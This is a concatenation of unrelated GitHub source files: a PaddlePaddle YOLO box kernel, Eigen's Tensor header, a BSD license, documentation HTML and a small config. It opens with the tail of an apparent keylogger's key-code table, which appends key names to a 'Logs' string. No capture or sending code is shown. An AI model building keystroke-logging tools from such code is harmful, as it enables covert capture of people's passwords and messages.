Logs += "[Tab]" case 13: Logs += "[Enter]" case 16: Logs += "[Shift]" case 17: Logs += "[Control]" case 18: Logs += "[Alt]" case 19: Logs += "[Pause]" case 27: Logs += "[Esc]" case 32: Logs += " " case 33: Logs += "[PageUp]" case 34: Logs += "[PageDown]" case 35: Logs += "[End]" case 36: Logs += "[Home]" case 37: Logs += "[Left]" case 38: Logs += "[Up]" case 39: Logs += "[Right]" case 40: Logs += "[Down]" case 44: Logs += "[PrintScreen]" case 45: Logs += "[Insert]" case 46: Logs += "[Delete]" case 48: Logs += "[0)]" case 49: Logs += "[1!]" case 50: Logs += "[2@]" case 51: Logs += "[3#]" case 52: Logs += "[4$]" case 53: Logs += "[5%]" case 54: Logs += "[6¨]" case 55: Logs += "[7&]" case 56: Logs += "[8*]" case 57: Logs += "[9(]" case 65: Logs += "A" case 66: Logs += "B" case 67: Logs += "C" case 186: Logs += "Ç" case 68: Logs += "D" case 69: Logs += "E" case 70: Logs += "F" case 71: Logs += "G" case 72: Logs += "H" case 73: Logs += "I" case 74: Logs += "J" case 75: Logs += "K" case 76: Logs += "L" case 77: Logs += "M" case 78: Logs += "N" case 79: Logs += "O" case 80: Logs += "P" case 81: Logs += "Q" case 82: Logs += "R" case 83: Logs += "S" case 84: Logs += "T" case 85: Logs += "U" case 86: Logs += "V" case 87: Logs += "W" case 88: Logs += "X" case 89: Logs += "Y" case 90: Logs += "Z" case 96: Logs += "0" case 97: Logs += "1" case 98: Logs += "2" case 99: Logs += "3" case 100: Logs += "4" case 101: Logs += "5" case 102: Logs += "6" case 103: Logs += "7" case 104: Logs += "8" case 105: Logs += "9" case 106: Logs += "*" case 107: Logs += "+" case 109: Logs += "-" case 110: Logs += "," case 111: Logs += "/" case 112: Logs += "[F1]" case 113: Logs += "[F2]" case 114: Logs += "[F3]" case 115: Logs += "[F4]" case 116: Logs += "[F5]" case 117: Logs += "[F6]" case 118: Logs += "[F7]" case 119: Logs += "[F8]" case 120: Logs += "[F9]" case 121: Logs += "[F10]" case 122: Logs += "[F11]" case 123: Logs += "[F12]" case 91: Logs += "[Super]" case 93: Logs += "[Menu]" case 144: Logs += "[NumLock]" case 189: Logs += "[-_]" case 187: Logs += "[=+]" case 188: Logs += "[,<]" case 190: Logs += "[.>]" case 191: Logs += "[;:]" case 192: Logs += "['\"]" case 193: Logs += "[/?]" case 221: Logs += "[[{]" case 220: Logs += "[]}]" case 226: Logs += "[\\|]" } } } }
{ "pile_set_name": "Github" }
/* Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ #pragma once #include <algorithm> #include <vector> #include "paddle/fluid/framework/op_registry.h" #include "paddle/fluid/platform/hostdevice.h" namespace paddle { namespace operators { using Tensor = framework::Tensor; template <typename T> HOSTDEVICE inline T sigmoid(T x) { return 1.0 / (1.0 + std::exp(-x)); } template <typename T> HOSTDEVICE inline void GetYoloBox(T* box, const T* x, const int* anchors, int i, int j, int an_idx, int grid_size, int input_size, int index, int stride, int img_height, int img_width, float scale, float bias) { box[0] = (i + sigmoid<T>(x[index]) * scale + bias) * img_width / grid_size; box[1] = (j + sigmoid<T>(x[index + stride]) * scale + bias) * img_height / grid_size; box[2] = std::exp(x[index + 2 * stride]) * anchors[2 * an_idx] * img_width / input_size; box[3] = std::exp(x[index + 3 * stride]) * anchors[2 * an_idx + 1] * img_height / input_size; } HOSTDEVICE inline int GetEntryIndex(int batch, int an_idx, int hw_idx, int an_num, int an_stride, int stride, int entry) { return (batch * an_num + an_idx) * an_stride + entry * stride + hw_idx; } template <typename T> HOSTDEVICE inline void CalcDetectionBox(T* boxes, T* box, const int box_idx, const int img_height, const int img_width, bool clip_bbox) { boxes[box_idx] = box[0] - box[2] / 2; boxes[box_idx + 1] = box[1] - box[3] / 2; boxes[box_idx + 2] = box[0] + box[2] / 2; boxes[box_idx + 3] = box[1] + box[3] / 2; if (clip_bbox) { boxes[box_idx] = boxes[box_idx] > 0 ? boxes[box_idx] : static_cast<T>(0); boxes[box_idx + 1] = boxes[box_idx + 1] > 0 ? boxes[box_idx + 1] : static_cast<T>(0); boxes[box_idx + 2] = boxes[box_idx + 2] < img_width - 1 ? boxes[box_idx + 2] : static_cast<T>(img_width - 1); boxes[box_idx + 3] = boxes[box_idx + 3] < img_height - 1 ? boxes[box_idx + 3] : static_cast<T>(img_height - 1); } } template <typename T> HOSTDEVICE inline void CalcLabelScore(T* scores, const T* input, const int label_idx, const int score_idx, const int class_num, const T conf, const int stride) { for (int i = 0; i < class_num; i++) { scores[score_idx + i] = conf * sigmoid<T>(input[label_idx + i * stride]); } } template <typename T> class YoloBoxKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext& ctx) const override { auto* input = ctx.Input<Tensor>("X"); auto* imgsize = ctx.Input<Tensor>("ImgSize"); auto* boxes = ctx.Output<Tensor>("Boxes"); auto* scores = ctx.Output<Tensor>("Scores"); auto anchors = ctx.Attr<std::vector<int>>("anchors"); int class_num = ctx.Attr<int>("class_num"); float conf_thresh = ctx.Attr<float>("conf_thresh"); int downsample_ratio = ctx.Attr<int>("downsample_ratio"); bool clip_bbox = ctx.Attr<bool>("clip_bbox"); float scale = ctx.Attr<float>("scale_x_y"); float bias = -0.5 * (scale - 1.); const int n = input->dims()[0]; const int h = input->dims()[2]; const int w = input->dims()[3]; const int box_num = boxes->dims()[1]; const int an_num = anchors.size() / 2; int input_size = downsample_ratio * h; const int stride = h * w; const int an_stride = (class_num + 5) * stride; Tensor anchors_; auto anchors_data = anchors_.mutable_data<int>({an_num * 2}, ctx.GetPlace()); std::copy(anchors.begin(), anchors.end(), anchors_data); const T* input_data = input->data<T>(); const int* imgsize_data = imgsize->data<int>(); T* boxes_data = boxes->mutable_data<T>({n, box_num, 4}, ctx.GetPlace()); memset(boxes_data, 0, boxes->numel() * sizeof(T)); T* scores_data = scores->mutable_data<T>({n, box_num, class_num}, ctx.GetPlace()); memset(scores_data, 0, scores->numel() * sizeof(T)); T box[4]; for (int i = 0; i < n; i++) { int img_height = imgsize_data[2 * i]; int img_width = imgsize_data[2 * i + 1]; for (int j = 0; j < an_num; j++) { for (int k = 0; k < h; k++) { for (int l = 0; l < w; l++) { int obj_idx = GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 4); T conf = sigmoid<T>(input_data[obj_idx]); if (conf < conf_thresh) { continue; } int box_idx = GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 0); GetYoloBox<T>(box, input_data, anchors_data, l, k, j, h, input_size, box_idx, stride, img_height, img_width, scale, bias); box_idx = (i * box_num + j * stride + k * w + l) * 4; CalcDetectionBox<T>(boxes_data, box, box_idx, img_height, img_width, clip_bbox); int label_idx = GetEntryIndex(i, j, k * w + l, an_num, an_stride, stride, 5); int score_idx = (i * box_num + j * stride + k * w + l) * class_num; CalcLabelScore<T>(scores_data, input_data, label_idx, score_idx, class_num, conf, stride); } } } } } }; } // namespace operators } // namespace paddle
{ "pile_set_name": "Github" }
# merb-more <ul class='toc'><li><a href='/en/merb-more/authentication'>Authentication</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#merbauth_gems'>Merb-auth gems</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#merbauthcore'>merb-auth-core</a></li><li><a href='/en/merb-more/authentication#merbauthmore'>merb-auth-more</a></li><li><a href='/en/merb-more/authentication#merbauthslicepassword'>merb-auth-slice-password</a></li></ul></li><li><a href='/en/merb-more/authentication#authentication_in_merb_stack'>Authentication in Merb Stack</a></li><li><a href='/en/merb-more/authentication#authenticated_hello_world'>Authenticated Hello World</a><ul style='list-style: none;'><li><a href='/en/merb-more/authentication#generate_an_application'>Generate an application</a></li><li><a href='/en/merb-more/authentication#generate_something_to_protect'>Generate something to protect</a></li><li><a href='/en/merb-more/authentication#protect_the_route'>Protect the route</a></li><li><a href='/en/merb-more/authentication#protect_the_controller'>Protect the controller</a></li><li><a href='/en/merb-more/authentication#overwrite_the_default_views'>Overwrite the default views</a></li></ul></li><li><a href='/en/merb-more/authentication#testing_an_authenticated_request'>Testing an authenticated request</a></li></ul></li></ul> <ul class='toc'><li><a href='/en/merb-more/mailer'>Mailer</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/caching'>Caching</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/exceptions'>Exceptions</a></li></ul> <ul class='toc'><li><a href='/en/merb-more/slices'>Slices</a></li></ul>
{ "pile_set_name": "Github" }
The BSD License Copyright (c) 2009, Andrey Gliznetsov ([email protected]) All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met - Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. - Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation andor other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
{ "pile_set_name": "Github" }
// This file is part of Eigen, a lightweight C++ template library // for linear algebra. // // Copyright (C) 2014 Benoit Steiner <[email protected]> // Copyright (C) 2013 Christian Seiler <[email protected]> // // This Source Code Form is subject to the terms of the Mozilla // Public License v. 2.0. If a copy of the MPL was not distributed // with this file, You can obtain one at http://mozilla.org/MPL/2.0/. #ifndef EIGEN_CXX11_TENSOR_TENSOR_H #define EIGEN_CXX11_TENSOR_TENSOR_H namespace Eigen { /** \class Tensor * \ingroup CXX11_Tensor_Module * * \brief The tensor class. * * The %Tensor class is the work-horse for all \em dense tensors within Eigen. * * The %Tensor class encompasses only dynamic-size objects so far. * * The first two template parameters are required: * \tparam Scalar_ \anchor tensor_tparam_scalar Numeric type, e.g. float, double, int or std::complex<float>. * User defined scalar types are supported as well (see \ref user_defined_scalars "here"). * \tparam NumIndices_ Number of indices (i.e. rank of the tensor) * * The remaining template parameters are optional -- in most cases you don't have to worry about them. * \tparam Options_ \anchor tensor_tparam_options A combination of either \b #RowMajor or \b #ColMajor, and of either * \b #AutoAlign or \b #DontAlign. * The former controls \ref TopicStorageOrders "storage order", and defaults to column-major. The latter controls alignment, which is required * for vectorization. It defaults to aligning tensors. Note that tensors currently do not support any operations that profit from vectorization. * Support for such operations (i.e. adding two tensors etc.) is planned. * * You can access elements of tensors using normal subscripting: * * \code * Eigen::Tensor<double, 4> t(10, 10, 10, 10); * t(0, 1, 2, 3) = 42.0; * \endcode * * This class can be extended with the help of the plugin mechanism described on the page * \ref TopicCustomizingEigen by defining the preprocessor symbol \c EIGEN_TENSOR_PLUGIN. * * <i><b>Some notes:</b></i> * * <dl> * <dt><b>Relation to other parts of Eigen:</b></dt> * <dd>The midterm developement goal for this class is to have a similar hierarchy as Eigen uses for matrices, so that * taking blocks or using tensors in expressions is easily possible, including an interface with the vector/matrix code * by providing .asMatrix() and .asVector() (or similar) methods for rank 2 and 1 tensors. However, currently, the %Tensor * class does not provide any of these features and is only available as a stand-alone class that just allows for * coefficient access. Also, when fixed-size tensors are implemented, the number of template arguments is likely to * change dramatically.</dd> * </dl> * * \ref TopicStorageOrders */ template<typename Scalar_, int NumIndices_, int Options_, typename IndexType_> class Tensor : public TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> > { public: typedef Tensor<Scalar_, NumIndices_, Options_, IndexType_> Self; typedef TensorBase<Tensor<Scalar_, NumIndices_, Options_, IndexType_> > Base; typedef typename Eigen::internal::nested<Self>::type Nested; typedef typename internal::traits<Self>::StorageKind StorageKind; typedef typename internal::traits<Self>::Index Index; typedef Scalar_ Scalar; typedef typename NumTraits<Scalar>::Real RealScalar; typedef typename Base::CoeffReturnType CoeffReturnType; enum { IsAligned = bool(EIGEN_MAX_ALIGN_BYTES>0) & !(Options_&DontAlign), Layout = Options_ & RowMajor ? RowMajor : ColMajor, CoordAccess = true, RawAccess = true }; static const int Options = Options_; static const int NumIndices = NumIndices_; typedef DSizes<Index, NumIndices_> Dimensions; protected: TensorStorage<Scalar, Dimensions, Options> m_storage; #ifdef EIGEN_HAS_SFINAE template<typename CustomIndices> struct isOfNormalIndex{ static const bool is_array = internal::is_base_of<array<Index, NumIndices>, CustomIndices>::value; static const bool is_int = NumTraits<CustomIndices>::IsInteger; static const bool value = is_array | is_int; }; #endif public: // Metadata EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index rank() const { return NumIndices; } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index dimension(std::size_t n) const { return m_storage.dimensions()[n]; } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Dimensions& dimensions() const { return m_storage.dimensions(); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index size() const { return m_storage.size(); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar *data() { return m_storage.data(); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar *data() const { return m_storage.data(); } // This makes EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED // work, because that uses base().coeffRef() - and we don't yet // implement a similar class hierarchy inline Self& base() { return *this; } inline const Self& base() const { return *this; } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> EIGEN_DEVICE_FUNC inline const Scalar& coeff(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const { // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) return coeff(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}}); } #endif // normal indices EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(const array<Index, NumIndices>& indices) const { eigen_internal_assert(checkIndexRange(indices)); return m_storage.data()[linearizedIndex(indices)]; } // custom indices #ifdef EIGEN_HAS_SFINAE template<typename CustomIndices, EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) ) > EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(CustomIndices& indices) const { return coeff(internal::customIndices2Array<Index,NumIndices>(indices)); } #endif EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff() const { EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE); return m_storage.data()[0]; } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& coeff(Index index) const { eigen_internal_assert(index >= 0 && index < size()); return m_storage.data()[index]; } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> inline Scalar& coeffRef(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) { // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) return coeffRef(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}}); } #endif // normal indices EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(const array<Index, NumIndices>& indices) { eigen_internal_assert(checkIndexRange(indices)); return m_storage.data()[linearizedIndex(indices)]; } // custom indices #ifdef EIGEN_HAS_SFINAE template<typename CustomIndices, EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) ) > EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(CustomIndices& indices) { return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices)); } #endif EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef() { EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE); return m_storage.data()[0]; } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index) { eigen_internal_assert(index >= 0 && index < size()); return m_storage.data()[index]; } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> inline const Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) const { // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) return this->operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}}); } #else EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1) const { return coeff(array<Index, 2>(i0, i1)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2) const { return coeff(array<Index, 3>(i0, i1, i2)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3) const { return coeff(array<Index, 4>(i0, i1, i2, i3)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4) const { return coeff(array<Index, 5>(i0, i1, i2, i3, i4)); } #endif // custom indices #ifdef EIGEN_HAS_SFINAE template<typename CustomIndices, EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) ) > EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(CustomIndices& indices) const { return coeff(internal::customIndices2Array<Index,NumIndices>(indices)); } #endif // normal indices EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(const array<Index, NumIndices>& indices) const { return coeff(indices); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()(Index index) const { eigen_internal_assert(index >= 0 && index < size()); return coeff(index); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator()() const { EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE); return coeff(); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE const Scalar& operator[](Index index) const { // The bracket operator is only for vectors, use the parenthesis operator instead. EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE); return coeff(index); } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> inline Scalar& operator()(Index firstIndex, Index secondIndex, IndexTypes... otherIndices) { // The number of indices used to access a tensor coefficient must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherIndices) + 2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) return operator()(array<Index, NumIndices>{{firstIndex, secondIndex, otherIndices...}}); } #else EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1) { return coeffRef(array<Index, 2>(i0, i1)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2) { return coeffRef(array<Index, 3>(i0, i1, i2)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3) { return coeffRef(array<Index, 4>(i0, i1, i2, i3)); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index i0, Index i1, Index i2, Index i3, Index i4) { return coeffRef(array<Index, 5>(i0, i1, i2, i3, i4)); } #endif // normal indices EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(const array<Index, NumIndices>& indices) { return coeffRef(indices); } // custom indices #ifdef EIGEN_HAS_SFINAE template<typename CustomIndices, EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomIndices>::value) ) > EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(CustomIndices& indices) { return coeffRef(internal::customIndices2Array<Index,NumIndices>(indices)); } #endif EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()(Index index) { eigen_assert(index >= 0 && index < size()); return coeffRef(index); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator()() { EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE); return coeffRef(); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& operator[](Index index) { // The bracket operator is only for vectors, use the parenthesis operator instead EIGEN_STATIC_ASSERT(NumIndices == 1, YOU_MADE_A_PROGRAMMING_MISTAKE) return coeffRef(index); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor() : m_storage() { } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(const Self& other) : m_storage(other.m_storage) { } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index firstDimension, IndexTypes... otherDimensions) : m_storage(firstDimension, otherDimensions...) { // The number of dimensions used to construct a tensor must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } #else EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(Index dim1) : m_storage(dim1, array<Index, 1>(dim1)) { EIGEN_STATIC_ASSERT(1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2) : m_storage(dim1*dim2, array<Index, 2>(dim1, dim2)) { EIGEN_STATIC_ASSERT(2 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3) : m_storage(dim1*dim2*dim3, array<Index, 3>(dim1, dim2, dim3)) { EIGEN_STATIC_ASSERT(3 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4) : m_storage(dim1*dim2*dim3*dim4, array<Index, 4>(dim1, dim2, dim3, dim4)) { EIGEN_STATIC_ASSERT(4 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(Index dim1, Index dim2, Index dim3, Index dim4, Index dim5) : m_storage(dim1*dim2*dim3*dim4*dim5, array<Index, 5>(dim1, dim2, dim3, dim4, dim5)) { EIGEN_STATIC_ASSERT(5 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) } #endif /** Normal Dimension */ EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE explicit Tensor(const array<Index, NumIndices>& dimensions) : m_storage(internal::array_prod(dimensions), dimensions) { EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED } template<typename OtherDerived> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, ReadOnlyAccessors>& other) { typedef TensorAssignOp<Tensor, const OtherDerived> Assign; Assign assign(*this, other.derived()); resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions()); internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice()); } template<typename OtherDerived> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor(const TensorBase<OtherDerived, WriteAccessors>& other) { typedef TensorAssignOp<Tensor, const OtherDerived> Assign; Assign assign(*this, other.derived()); resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions()); internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice()); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor& operator=(const Tensor& other) { typedef TensorAssignOp<Tensor, const Tensor> Assign; Assign assign(*this, other); resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions()); internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice()); return *this; } template<typename OtherDerived> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Tensor& operator=(const OtherDerived& other) { typedef TensorAssignOp<Tensor, const OtherDerived> Assign; Assign assign(*this, other); resize(TensorEvaluator<const Assign, DefaultDevice>(assign, DefaultDevice()).dimensions()); internal::TensorExecutor<const Assign, DefaultDevice>::run(assign, DefaultDevice()); return *this; } #if EIGEN_HAS_VARIADIC_TEMPLATES template<typename... IndexTypes> EIGEN_DEVICE_FUNC void resize(Index firstDimension, IndexTypes... otherDimensions) { // The number of dimensions used to resize a tensor must be equal to the rank of the tensor. EIGEN_STATIC_ASSERT(sizeof...(otherDimensions) + 1 == NumIndices, YOU_MADE_A_PROGRAMMING_MISTAKE) resize(array<Index, NumIndices>{{firstDimension, otherDimensions...}}); } #endif /** Normal Dimension */ EIGEN_DEVICE_FUNC void resize(const array<Index, NumIndices>& dimensions) { int i; Index size = Index(1); for (i = 0; i < NumIndices; i++) { internal::check_rows_cols_for_overflow<Dynamic>::run(size, dimensions[i]); size *= dimensions[i]; } #ifdef EIGEN_INITIALIZE_COEFFS bool size_changed = size != this->size(); m_storage.resize(size, dimensions); if(size_changed) EIGEN_INITIALIZE_COEFFS_IF_THAT_OPTION_IS_ENABLED #else m_storage.resize(size, dimensions); #endif } // Why this overload, DSizes is derived from array ??? // EIGEN_DEVICE_FUNC void resize(const DSizes<Index, NumIndices>& dimensions) { array<Index, NumIndices> dims; for (int i = 0; i < NumIndices; ++i) { dims[i] = dimensions[i]; } resize(dims); } EIGEN_DEVICE_FUNC void resize() { EIGEN_STATIC_ASSERT(NumIndices == 0, YOU_MADE_A_PROGRAMMING_MISTAKE); // Nothing to do: rank 0 tensors have fixed size } /** Custom Dimension */ #ifdef EIGEN_HAS_SFINAE template<typename CustomDimension, EIGEN_SFINAE_ENABLE_IF( !(isOfNormalIndex<CustomDimension>::value) ) > EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void resize(CustomDimension& dimensions) { resize(internal::customIndices2Array<Index,NumIndices>(dimensions)); } #endif #ifndef EIGEN_EMULATE_CXX11_META_H template <typename std::ptrdiff_t... Indices> EIGEN_DEVICE_FUNC void resize(const Sizes<Indices...>& dimensions) { array<Index, NumIndices> dims; for (int i = 0; i < NumIndices; ++i) { dims[i] = static_cast<Index>(dimensions[i]); } resize(dims); } #else template <std::size_t V1, std::size_t V2, std::size_t V3, std::size_t V4, std::size_t V5> EIGEN_DEVICE_FUNC void resize(const Sizes<V1, V2, V3, V4, V5>& dimensions) { array<Index, NumIndices> dims; for (int i = 0; i < NumIndices; ++i) { dims[i] = static_cast<Index>(dimensions[i]); } resize(dims); } #endif protected: bool checkIndexRange(const array<Index, NumIndices>& indices) const { using internal::array_apply_and_reduce; using internal::array_zip_and_reduce; using internal::greater_equal_zero_op; using internal::logical_and_op; using internal::lesser_op; return // check whether the indices are all >= 0 array_apply_and_reduce<logical_and_op, greater_equal_zero_op>(indices) && // check whether the indices fit in the dimensions array_zip_and_reduce<logical_and_op, lesser_op>(indices, m_storage.dimensions()); } EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Index linearizedIndex(const array<Index, NumIndices>& indices) const { if (Options&RowMajor) { return m_storage.dimensions().IndexOfRowMajor(indices); } else { return m_storage.dimensions().IndexOfColMajor(indices); } } }; } // end namespace Eigen #endif // EIGEN_CXX11_TENSOR_TENSOR_H
{ "pile_set_name": "Github" }
{ "texture_filenames": [ "textures/multiplayer_dead.webp" ], "blendmode": "ALPHA", "desired_format": [ "F_8888" ] }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <title>UINavigationController Extension Reference</title> <link rel="stylesheet" type="text/css" href="../css/jazzy.css" /> <link rel="stylesheet" type="text/css" href="../css/highlight.css" /> <meta charset='utf-8'> <script src="../js/jquery.min.js" defer></script> <script src="../js/jazzy.js" defer></script> </head> <body> <a name="//apple_ref/swift/Extension/UINavigationController" class="dashAnchor"></a> <a title="UINavigationController Extension Reference"></a> <header> <div class="content-wrapper"> <p><a href="../index.html">DeckTransition Docs</a> (100% documented)</p> <p class="header-right"><a href="https://github.com/HarshilShah/DeckTransition"><img src="../img/gh.png"/>View on GitHub</a></p> <p class="header-right"><a href="dash-feed://https%3A%2F%2Fharshilshah%2Egithub%2Eio%2Fdocsets%2FDeckTransition%2Exml"><img src="../img/dash.png"/>Install in Dash</a></p> </div> </header> <div class="content-wrapper"> <p id="breadcrumbs"> <a href="../index.html">DeckTransition Reference</a> <img id="carat" src="../img/carat.png" /> UINavigationController Extension Reference </p> </div> <div class="content-wrapper"> <nav class="sidebar"> <ul class="nav-groups"> <li class="nav-group-name"> <a 